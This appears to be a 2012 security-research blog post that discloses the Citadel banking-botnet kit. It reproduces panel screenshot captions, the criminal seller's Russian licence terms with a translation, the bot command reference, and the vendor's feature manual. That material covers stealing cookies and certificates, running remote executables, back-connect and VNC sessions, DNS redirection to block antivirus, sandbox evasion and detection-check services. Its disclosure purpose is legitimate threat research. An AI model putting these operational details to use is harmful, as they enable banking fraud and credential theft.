2012-07-29 - Panel
Inside Citadel 1.3.4.5 C&C & Builder - Botnet Control Panel
Citadel Panel v1.3.4.5 :
Citadel - Login Screen |
Citadel - Summary |
Citadel - OS |
Citadel - Installed Software - Softwares |
Citadel - Installed Software - Firewall |
Citadel - Installed Software - Antivirus |
Citadel - Bots |
Citadel - Full information about bot |
Citadel - Scripts |
Citadel - New Script |
Citadel - VNC |
Citadel - Search in Datase |
Citadel - Context menu available on each bot mention |
Citadel - Bot - All information |
Citadel - Type of Report |
Citadel - Report - HTTP request |
Citadel - Report - Grabbed Data (FTP Client) |
Citadel - Report - Installed Software |
Citadel - Video Viewer |
Citadel - French Bank vs Video Viewer |
Citadel - Video Player - Activated on a French Banque |
Citadel - Video Player - French Banque virtual Keyboard - Pass being recorded |
Citadel - Search in Files |
Citadel - CMD Parser |
Citadel - Jabber Notifier |
Citadel - Informations |
Citadel - Options |
Citadel - User |
Citadel - Users |
Citadel v1.3.4.5 Builder:
Citadel - Builder Tree |
Citadel - builder folder |
Citadel v1.3.4.5 Builder - 1 client = 1 builder |
Licence Agreement - Original (Pastebin)
-------------------------------------------------------------------------------------------
Лицензионное соглашение Citadel Software.
1. Приобретая продукт Citadel, вся ответственность за его использование лежит на вас. Команда разработчиков Citadel Software не несет ответственности за любые неправомерные действия с использованием данного ПО.
2. Команда разработчиков Citadel Software категорически не поддерживают использование данного продукта на территории СНГ, продукт не будет работать на системах, с русскоязычной и украинской раскладкой.
3. После согласования условий в момент покупки и передачи денежных средств разработчику, данные средства не могут быть более возвращены клиенту обратно.
4. Перед покупкой, клиент обязуется ознакомиться с полным описанием продукта и его функционалом, при имеющихся вопросах, обратиться в тех.поддержку.
5. Клиент обязуетеся использовать персональный билдер на 1 компьютере (виртуальной машине) и не передавать его третьим лицам, персональный билдер имеет уникальную сигнатуру, принадлежащую только вам. Все остальные вопросы по данному вопросу оговариваются в личной беседе. Барыжнечество/перепродажа без согласия автора наказуемы black list'ом и лишением лицензии.
6. Клиент обязуетеся ежемесячно вносить арендную плату, установленную разработчиками. Максимальный срок просрочки - 7 дней. Если сумма аренды не была внесена, ваш аккаунт блокируется в Citadel CRM и вы лишаетесь всех дальнейших обновлений продукта на 1-2 месяца (решается индвидуально).
7. Разработчики обязаны выдать клиенту обновленный билдер ежемесячно, если клиентом была уплачена арендная плата. Данный билдер включает: плановую чистку продукта и необходимые багфиксы.
8. Любые вопросы/замеченые ошибки в софте/недочеты/идеи, принимаются исключительно через ticket-панель в вашем персональном аккаунте Citadel CRM. Данная ticket-панель гарантирует вам оперативный ответ на возникший запрос.
9. Клиенту выдается аккаунт в системе Citadel CRM, данный аккаунт принадлежит исключительно клиенту и передача его третьим лицам запрещена.
10. Клиент имеет право передать или продать свою лицензию на продукт, предварительно согласовав свои действия с разработчиками.
11. Команда разработчиков Citadel Software не несет ответственности за обнаружение продукта в различных антивирусных системах, но в свою очередь старается этого недопускать и делать все необходимое для избежания этого.
12. Все операции с денежными средствами осуществляются исключительно через платежную систему Liberty Reserve, другие платежные инструменты недопускаются к использованию. Оперативно обменять средства из различных платежных систем, можно на сайте mmgp.ru
13. Дополнительные модули для продукта Citadel можно приобрести в любое время.
14. В случае неразрешения споров по поводу корректной работы функционала софта, клиент обязуется предоставить TeamViewer доступ к ПК где установлен тестовой бот или вебсервер support'у, в противном случае support не сможет оказать помощь в данном вопросе.
15. В задачи тех.поддержки не входит установка и настройка софта на сервере/серверах клиента, клиент обязуется сам установить или настроить необходимое ПО на сервере, либо привлечь соответствующих специалистов, а также протестировать корректную работу ПО. Установка и настройка продукта тех.поддержкой осуществляется за доп.плату.
16. Citadel не продается англоязычной публике (амеры, румыны, азиаты, любой англоговорящий человек), запрещено быть представителями данных субъектов и обслуживать их интересы(читать: быть посредником), за несоблюдение данного правила следует лишение лицензии. Only for Russians.
17. Запрещено организовывать сервисы по продаже разовых "билдов" Citadel.
-------------------------------------------------------------------------------------------
Licence Agreement - Google Translate (Pastebin)
-------------------------------------------------------------------------------------------
License Agreement Citadel Software.
A. By purchasing a product Citadel, the entire responsibility for its use rests with you. The development team Citadel Software is not responsible for any illegal actions by using the software.
Two. The development team Citadel Software strongly support the use of this product in the CIS, the product will not work on systems with the Russian and Ukrainian keyboard layout.
Three. After agreeing on the conditions at the time of purchase and transfer of funds the developer, the funds could not be more than returned to the client back.
4. Before you buy, the customer agrees to read the full description of the product and its functionality, if available questions, contact the Supporter.
Five. Customer agree to use a personal computer builder on a (virtual machine) and do not pass it on to any third party, personal builder has a unique signature that belongs to you. All other questions on this matter are specified in a personal conversation. Baryzhnechestvo / resale without the consent of the author and punishable by deprivation of black list'om license.
6. Customer agree to pay the rent on a monthly basis, established developers. The maximum period of delay - 7 days. If the amount of rent was not paid, your account is blocked in the Citadel CRM, and you lose all the future updates of the product for 1-2 months (indvidualno solved).
7. Developers must give the client an updated monthly builder, if the client was paid the rent. This builder includes routine cleaning of the product and the necessary bug fixes.
Eight. Any questions / errors found in software / bugs / ideas are accepted only through the ticket-bar in your personal account Citadel CRM. This ticket-panel guarantees you prompt response to a query has arisen.
9. Customer account is given in the Citadel CRM, this account belongs exclusively to the client and transfer it to third parties is prohibited.
10. The client has the right to transfer or sell their product license, pre-coordinate with the developers.
11. The development team Citadel Software is not responsible for the detection of anti-virus product in different systems, but in turn this nedopuskat and tries to do everything necessary to avoid that.
12. All operations are carried out with funds solely through the payment system Liberty Reserve, other payment instruments nedopuskayutsya to use. Promptly exchange funds from the various payment systems, please visit mmgp.ru
13. Additional modules for the Citadel of the product can be purchased at any time.
14. In the case of unresolved disputes about the correct operation of software functionality, the client agrees to provide TeamViewer access to a PC where you installed the test boat, or webserver support'u, otherwise the support will not be able to help in this matter.
15. The tasks of the Help Desk does not include installing and configuring software on a server / client server, the client agrees to itself install or configure the necessary software on the server, or to draw appropriate specialists, as well as to test the correct operation of software. Installing and configuring the product Technical support is for extra charge.
16. Citadel does not sell English-language public (amers, Romanians, Asians, all English speaking people), it is forbidden to be representatives of data subjects and to serve their interests (read: a mediator), for non-compliance of the rules should deprive the license. Only for Russians.
17. It is forbidden to organize services for the sale of one-off "builds" Citadel.
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Работы с OC.
os_shutdown - Выключить компьютер
os_reboot - Перегрузить компьютер
Работа с ботом.
bot_uninstall - Выгрузить бота с компьютера
bot_update [url] - Обновить конфигурацию бота
bot_bc_add [service] [ip] [port] - Создать бек-коннект соединение с ботом
bot_bc_remove [service] [ip] [port] - Удалить бек-коннект соеднение с ботом
bot_httpinject_disable [url_mask] - Отключить выполнение инжекта у бота
bot_httpinject_enable [url_mask] - Включить выполнение инжекта у бота
Работа с пользователем.
user_destroy - Убить ОСь бота
user_logoff - Завершить сеанс пользователя бота
user_execute [url] - Запустить исполняемый файл на компьютере бота
user_cookies_get - Получить куки с компьютера бота
user_cookies_remove - Удалить куки с компьютера бота
user_certs_get - Получить сертификаты с компьютера бота
user_certs_remove - Удалить сертификаты с компьютера бота
user_homepage_set [url] - Задать URL как домашнюю страницу боту
user_flashplayer_get - Получить SOL файлы с компьютера бота
user_flashplayer_remove - Удалить SOL файлы с компьютера бота
dns_filter_add <host> <ip> - добавление маски для редиректа
dns_filter_add *microsoft.com 127.0.0.1 - добавление маски для редиректа
dns_filter_remove *microsoft.com - удаление маски для редиректа
dns_filter_remove <host>
при удалении должен быть указан такой же хост как и при добавлении
url_open http://www.host.com
Открываем на компьютере холдера произвольную заданную страницу дефлотовым браузером на полный экран, идеально для рекламы чего-либо
user_execute http://www.citadel-host.com/citadel_folder/file.php|file=exe.exe
Команда работает без кавычек, начиная с версии 1.2.4.0, для выполнения нужно залить нужный ехе файл в директорию files на вашей цитадели и указать его в конце строчки.
- У нас добавилась новая опция в секции entry "StaticConfig"
disable_cookies 0
1 выключает отсылку cookies на сервер вообще.
0 включает отсылку cookies на сервер.
- Теперь по поводу cекции WebFilters
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметр ! игнорирует заданные запросы по маске и не пропускает их в логи.
Examples:
"Phttp://*.com/" - грабит только все пост-запросы в http://. https:// игнорирует
"Ghttp://*.eu/*banking*" - грабит только все GET запросы по заданной маске.
"Phttps://*.com/" - грабит только https://-post запросы
"!http://*.com/*.jpg" - игнор jpg картинок.
- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_software
- Получение информации об установленном антивирусе на компьютере: info_get_antivirus
- Получение информации об установленном фаерволе на компьютере: info_get_firewall
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Work with the OC.
os_shutdown - Shut down the computer
os_reboot - Reboot the computer
Working with the bot.
bot_uninstall - Unload boat from your computer
bot_update [url] - Update the configuration of the bot
bot_bc_add [service] [ip] [port] - Create a back-Connect connection to the bot
bot_bc_remove [service] [ip] [port] - Remove back-soednenie connection with the bot
bot_httpinject_disable [url_mask] - Turn off injection produce a bot
bot_httpinject_enable [url_mask] - Enable the implementation of a bot inzhekta
Working with the user.
user_destroy - Kill Axis bot
user_logoff - Terminate a user session bot
user_execute [url] - Run the executable file on a computer bot
user_cookies_get - Get a cookie from your computer bot
user_cookies_remove - Remove the cookies from your computer bot
user_certs_get - Get a certificate from a computer bot
user_certs_remove - Delete certificate from a computer bot
user_homepage_set [url] - Specify URL as a homepage bot
user_flashplayer_get - Get the SOL files from a computer bot
user_flashplayer_remove - SOL delete files from a computer bot
dns_filter_add <host> <ip> - adding a mask to redirect
dns_filter_add * microsoft.com 127.0.0.1 - adding a mask to redirect
dns_filter_remove * microsoft.com - remove the mask to redirect
dns_filter_remove <host>
when you remove must be specified the same host as the addition of
url_open http://www.host.com
Open the computer Holder arbitrary given page deflotovym browser to full screen, ideal for advertising something
user_execute http://www.citadel-host.com/citadel_folder/file.php|file=exe.exe
The team is working without the quotes, starting with version 1.2.4.0, need to fill in for the right exe file in the directory of files on your stronghold and point it at the end of the line.
- We have added a new option in the section entry "StaticConfig"
disable_cookies 0
1 disables sending cookies to the server at all.
0 includes sending cookies to the server.
- Now on the Section's WebFilters
Two new parameters: P and G.
Parameter P is given to the link points to a record only POST requests (all others are ignored), with this link.
The parameter G indicates the recording just GET requests (all others are ignored) with the given link.
The parameter! ignores the requests specified by the mask and do not miss them in the logs.
Examples:
"Phttp :/ / *. Com /" - only to rob the post all requests in the http://. https:// ignores
"Ghttp :/ / *. Eu / * banking *" - robs just all GET requests for a given mask.
"Phttps :/ / *. Com /" - only to rob https://-post requests
"! Http:// *. Com / *. Jpg" - ignore jpg images.
- Getting information about installed software (the list - the company | product | version) on your computer: info_get_software
- Getting information about the installed antivirus on your computer: info_get_antivirus
- Getting information about the installed firewall on your computer: info_get_firewall
-------------------------------------------------------------------------------------------
Personal Manual - Original (Pastebin)
-------------------------------------------------------------------------------------------
Version 1.3.4.5
Manual Version: 2.0 (Последнее обновление 06.06.2012)
Список нововведений для бота:
[+] Фикс VNC бага на Vista/Windows 7. Теперь можно полноценно работать с Internet Explorer 8 (напомню, была проблема с рендерингом IE)
[+] Поддержка Mozilla Firefox 7.0 (решена проблема, при которой не слались отчеты в последних версиях браузера)
[+] Крипто-защита (расшифровывающая тело в памяти).
[+] Редиректы DNS (не через hosts). Можно блокировать/редиректить любые URL'ы, не опасаясь, что их заметит эвристика. Например заблокировать AV-cервера или редиректить банк-пагу на другой хост.
!BONUS! Список URL'ов популярных антивирусных программ для блокирования идет в комплекте.
[+] Информация о версии сотфа в репорте. Высылает вам подробную версию браузера холдера вместе с отчетом. Помогает, при имитации настроек холдера.
[+] Дополнительный уровень защиты сервера от трекеров - Login Key.
[+] Механизм аутинтефикации при загрузке конфигов (нет прямых урлов). Дает полноценную защиту от устоявшихся трекеров.
[+] Поддержка граббера Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+] Поддержка инжектов Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+} Добавлено кеширование поиска функций, что ускоряет установку хуков Chrome.
[+] Добавлена возможность выполнения системных CMD команд при старте бота (секция CMDList) с отправкой репорта на сервер. К примеру, нужно вам чтобы при инсталле, отправлялся результат команды "ipconfig /all", или список всех доступных шар. Полезно, при анализе внутренней структуры компаний. (например, часто попадаются боты в локалке с именами ACCOUNTANT_PC, POS_SERV, DATABASE...)
[+] Добавлен механизм проверки сохранности хуков на некоторых Windows.
[+] Эвристический анализатор окружения со стоп листом для нежелательного ПО (значительно повышает скрытность),включены все популярные антивирусы.
[+] Исправлены мелкие баги.
[+] Видео граббер. Уникальная возможность следить за работой ваших инжектов "глазами холдерами", в конфиге указываются список сайтов и длина записи видео в секундах, при заходе на заданный линк, активируется видео-запись в формате .mkv. Рекомендуется настроить свой сервер для приема файлов 10-60МБ.
[+] Убрано удаление кукисов при инсталле, т.к это сбивает "fingerprint" холдера при работе с заливами.
[+] добавлена поддержка HTTP 1.0 и расширенных хидеров (например респонз не всегда выглядит как "HTTP/1.1 200 OK", бывает "HTTP/1.1 200 follow document", в данном случае после кода 200 идет несколько слов) применимо к браузерам Firexfox & Chrome
[+] Добавлен гейт генератор (на случай, если вы хотите разместить файлы на промежуточном хосте для редиректа).
[+] Полностью переделано шифрование (передача данных, запись логов/видео, загрузка конфигов и т.д) у Citadel, на смену устаревшему RC4 используемому в Zeus, пришел AES 128. Напомню, что RC4 дал асечку, когда массово начали выпускаться различные декрипторы конфигов/инжектов для Zeus, а хосты начали палиться в abuse.ch.
Теперь помимо встроенного RC4, который шифруется с вашей персональной сигнатурой, в софт также встроено AES шифрование, на выходе мы получаем защищеное AES128 обращение бот<->гейт. Никакие ZeusDecryptor'ы(ThreatExpert) и автоматизированый реверсинг не будут помехой для вашей комфортной работы на текущий момент (Jan 2012).
[+] Весь базовый функционал, оставшийся от зевса присутствует. Думаю, не стоит его писать здесь снова.
[+] Исправлена ошибка записи репортов у веб-фильтров в конфиге с параметром "!" (игнорирование), который должен был исключать все заданные ссылки, а вместо этого делал обратное и писал их в лог.
[+] Добавлен новый параметр-фильтр в config-файл, а именно функция отсылать или не отсылать cookies на сервер.
Параметр статичного конфига disable_cookies 0/1 указывает отключить ли граббинг куков (1 - отключить, 0 - включить).
Вручную, также, кукисы можно получить командой user_cookies_get из админки, если очень нужны.
[+] Добавлена функция произвольного открытия страницы дефлотовым браузером пользователя на боте.
К примеру, если вам нужно накрутить какой-нибудь счетчик или статистику голосования или вы хотите получать доп.доход с вашего ботнета открывая страницы с шопами (а также: фарма, гемблинг, дроп-проекты и т.д..) отличный способ разрекламировать нужную страницу!
Новый параметр url_open <url>
[+] Новый вид фильтрации WebFilters в конфиг-файле при сборке.
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметры не комбинируются, т.е. следует указывать какой-то один из них.
[+] Добавлена модульная система в софт, что дает нам:
* Расширяемость и загрузку любого операционного функционала ботам, ориентированного для Citadel.
Все модули загружаются с сервера и распаковываются динамически в памяти, что исключает их детектирование.
Хранение и передача во внешнем мире исключительно в шифрованном виде.
Модули грузятся в целевые процесссы, поэтому весомо экономят память.
Большая управляемость - модули можно отключать через конфиг.
[+] Видео-граббер переделан на модульную основу. Теперь вес некриптованного билда <190 кб. Всегда.
[+] Добавлен новый параметр timer_modules (тайминги для загрузки модулей).
[+] Добавлена поддержка нового браузера Google Chrome 17, а также исправлен баг с обработкой Flash'a в нем.
[+] Добавлена поддержка макросов. Введены макросы: %BOTID%, %BOTNET%
* Можете вставлять в любой участок инжектов данные макросы и передавать данные на ваш сервер (АЗ/инжекты), передается имя бота и имя ботнета.
[+] Добавлены 4 команды управления модулями (включение/выключение, запрет/разрешение на скачивание).
[+] Добавлен новый параметр disable_httpgrabber 1/0 для Chrome: исключает обработку обычных HTTP (не HTTPS) запросов.
[+] Добавлена запись полного User-Agent в отчеты HTTP(S) граббера, позволяет клонировать холдерский UserAgent через любые утилиты типа CCTools.
[+] Добавлена запись разрешения экрана в отчеты HTTP(S) граббера, пример "Screen(w:h): 1600:900" - полезно при клонировании параметров холдера, многие банки на это обращают внимание.
[+] Изменен протокол отправки видео-файлов для снижения нагрузки на сервер (у некоторых были проблемы с нагрузкой на сервер и он сильно тормозил)
[+] Добавлена возможность отсылки jabber-уведомлений нескольким получателям в админке Citadel.
[+] Добавлена возможность указания нескольких url_config'ов (пути до основного конфига), раньше было так: если у вас недоступен основной конфиг в момент инсталла бота, то резервный никак не скачивался, теперь этой проблемы не будет и бот пытается стянуть конфиг с другого URL'a(можно вписать до 20 резервных).
[+] Исправлена ошибка в Google Chrome (17x) приводящая к зависанию подпроцесса, при открытии нескольких вкладок с инжектами.
[+] Добавлены новые команды:
- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_firewall
- Получение информации об установленном антивирусе на компьютере: info_get_antivirus
- Получение информации об установленном фаерволе на компьютере: info_get_firewall
Информация идет в виде отдельного репорта для каждого бота. Скоро встроим массовую статистику по установленному софту в админку Citadel.
[+] Изменен алгоритм антиэмуляции для ряда АВ (не считается криптором, софт стал невидимым для нескольких проактивок).
[+] Исправлена проблема запуска под пользователем SYSTEM.
[+] Добавлена возможность особых Jabber-уведомлений, при обнаружении заданных ботов по маске (к примеру маска *corporate*, будет искать botid с таким совпадением), даже если они не прислали никаких логов, скрипт уведомит вас в Jabber-сообщении о появлении бота. Теперь вы не пропустите мимо глаз ценных ботов.
[+] В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!
[+] Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 37.1%, ваши боты будут иметь самый свежий и чистый билд.
[+] Переработана система отправки отчетов на сервер, в предыдущих версиях для каждого отчета происходила единичная отправка POST запроса на гейт, в новой схеме отчеты отправляются пачкой по несколько штук, это позволяет свести до минимума количество сессий на сервере и нагрузка на сервере становится минимальной, что позволяет выдерживать большое количество ботов онлайн.
[+] Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.
[+] Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
[+] Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.
[+] Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом.
[+] Реализована совместимость инжектов с UTF-8 (теперь в инжекты можно вставлять любые языки, такие как японский, китайский и т.д)
[+] Разработана крипт-панель в админке Citadel. Это раздел в админке, который позволяет вам обновлять ехе-файл ботам, прямо из веба. В любой момент, вы можете перезакачать нужный ехе-файл и боты его своевременно скачают. Ведется история загрузок в формате: Файл | Дата Загрузки | Оплачено(Y/N)
По поводу последнего пункта, мы разделили полномочия и создали отдельную категорию пользователей с правами "криптера" - эти пользователи имеют доступ к вашей панели по вашему желанию и единственная привилегия этих пользователей - возможность обновлять ехе-файл, при этом вы можете отмечать в таблице, оплачен конкретный крипт или нет.
Можно включить jabber-уведомления по результату проверки на scan4you.
[+] Добавленны полноэкранные скриншоты (Опция в конфиге - "@@").
[+] Улучшен механизм автоапдейтинга: если вы столкнулись с проблемой большой нагрузки на сервере при обновлении(либо боты не переходят на новую админку), то этот фикс исправляет эту ситуацию. Фикс включает в себя:
- Старые репорты от прошлой версии ехе удаляются при обновлении (tmp файл), дополнительная подстраховка.
- Тяжелые отчеты (видео и прочее файловые репорты) дополнительно проверяются на корректность и удаляются в случае проблем(например, если такой файл уже закачан)
- Изменено время инициализации апдейтинга, в результате чего исклчючен deadloc и не возможность дальнейшего апдейта при какой-либо ошибке файловой системы.
[+] Исправили проблему мусорных логов в админке: убрали полное логирование Flash-роликов (swf/flv) из логов и всего Facebook, потому что огромное количество мусора идет именно от них.
[+] Модуль "Качественная проверка WebSocks" теперь встроен в админку, никаких лишних скриптов. Показывает: страну, штат, город, хостнейм, аптайм и ping lag.
Возможность входа в этот раздел без пароля, для удобства когда нужен срочно сокс smile.gif
[+] Модуль "Парсер логов" теперь встроен в админку, никаких лишних скриптов. Интерфейс значительно улучшен, добавлена возможность создания "избранных доменов", "архивных логов" и возможность парсинга https или http доменов на выбор. Выстраивается визуальная таблица всех доменов, которые фигурируют в логах.
[+] Добавлен раздел "Заметки" в админку Citadel, что-то вроде онлайн блокнота. Адаптировали интерфейс админки для планшетов iPad/Galaxy Tab.
[+] Доработали модуль "VNC-админка", теперь он встроен напрямую в админку Citadel, никаких дополнительных скриптов. Все устанавливается 1 кликом. Много новых возможностей, а именно:
- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.
- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.
- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.
- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.
- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.
- Возможность любых уведомлений в несколько Jabber'ов сразу.
[+] Исправлена проблема цепочки хуков в Chrome.
[+] При запуске user_execute с флагом "-f" принудительно переводится в режим только апдейтинга ехе и не будет запущен как инсталятор.
[+] Оптимизирована работа гейта, что позволило снизить нагрузку. Упрощена работа инсталлятора админки, что позволяет установить все модули в 1 клик.
[+] Добавлена поддержка новой версии Chrome 18 [инжекты/формграббинг]
[+] Добавлена кнопка "Все отчеты бота" в админке, позволяет просмотреть начало и конец отчетов от конкретного бота.
[+] Исправлен баг с ручной командой dns_filter_add, теперь блокировка URL'ов работает корректно.
[+] Исправлен баг с отображением ехе-файлов на главной странице, удаленные ехе теперь исчезают автоматически.
[+] Исправлен баг с работой планировщика заданий scan4you, ежедневная проверка ехе-файлов работает корректно.
[+] Добавлена единая система CRON-работы, одно cron-задание управляет теперь всеми задачами: jabber-уведомления, проверка файлов, работа модулей и т.п.
[+] Добавлена возможность удаления видео из админки.
[+] Добавлена отсылка примечания к боту в Jabber в VNC-модуле.
[+] Обновлена GeoIP база (конец 2011 года).
[+] Последний домен из AdvancedConfigs срабатывает с задержкой, сделано с целью защиты ваших резервных URL'ов от автоматического граббинга ханипотами.
[+] Исправлена работа скрипта архивирования данных в zip в админке (fsarc.php)
[+] Настройки Jabber-аккаунта и всех параметров теперь вынесены в общие настройки.
[+] Теперь можно указывать пути в конфиге с httpS:// (неподписанные сертификаты проходят)
[+] Исправлен баг с регистрозависимостью в инжектах, теперь <BODY> и <body> одинаковые сущности. Все инжекты регистронезависимые.
[+] Полностью измененый интерфейс веб-админки, user-friendly.
[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "Cookies" в контекстное меню по ботам, которая позволяет оперативно вывести все Cookies бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция вынесена в конфиг. antiemulation_enable 0/1
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию.
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в Header'ах, т.к она может мешать некоторым инжектам в работе.
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m)
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.
----------------------------------------------------------------------------
ДЛЯ УПРОЩЕНИЯ ПОНИМАНИЯ ИНФОРМАЦИИ, ВЫ МОЖЕТЕ ПРОПУСТИТЬ РАЗДЕЛЫ,
ГДЕ ОПИСАНА УСТАНОВКА И ИСПОЛЬЗОВАНИИ МОДУЛЕЙ, КОТОРЫЕ ВЫ НЕ ПРИОБРЕТАЛИ
ИСПОЛЬЗУЙТЕ CTRL+F ДЛЯ ПОИСКА КЛЮЧЕВЫХ СЛОВ И ОПРЕДЕЛЕНИЙ.
ПРИМЕРНЫЙ АДЕКВАТНЫЙ СРОК ПОНИМАНИЯ ВСЕХ ФУНКЦИЙ СОФТА - 1 НЕДЕЛЯ.
----------------------------------------------------------------------------
1) Доступ в CRM
http://citadelmovement.com/crm/
Сначала citadel;rightway
потом
Login: XXXXXXXXXXXXX
Password: XXXXXXXXXXXXX
Что такое Citadel CRM Store?
Это система взаимодействия между нашими клиентами и разработчиком.
Наверное, вам знакома ситуация, когда саппорт продукта игнорит ваши запросы в icq/jabber'e - этому способствует высокая нагруженность человека, который отвечает за все это, потому что клиентов много, а он один, да еще и занят делами.
